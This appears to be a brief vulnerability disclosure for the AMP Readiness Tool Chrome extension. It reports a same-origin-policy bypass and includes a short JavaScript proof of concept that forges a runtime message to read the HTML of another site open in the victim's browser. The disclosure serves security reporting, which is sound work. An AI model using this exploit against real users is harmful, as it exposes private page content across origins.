Summary:
SOP bypass via AMP Readiness Tool
Product:
AMP Readiness Tool
URL:
https://chrome.google.com/webstore/detail/amp-readiness-tool/fadclbipdhchagpdkjfcpippejnekimg
Vulnerability type:
Sensitive data exposure
Details
In the context of the content script on an attacker controlled site run:
window.onclick = () => {
open('https://www.google.com');
setTimeout(() => {
chrome.runtime.sendMessage({id: 'get_apps', tab: {id: ''}}, e => {console.log(e.html)})
}, 3000);
}
Click on the page and the console should log the victims html.
Attack scenario
A compromised renderer can bypass the SOP via the AMP Readiness Tool
Extension contact:
amp-readiness-tool-admin@google.com
I'm aware this bug is boring.
Done as part of Grant issue 286169438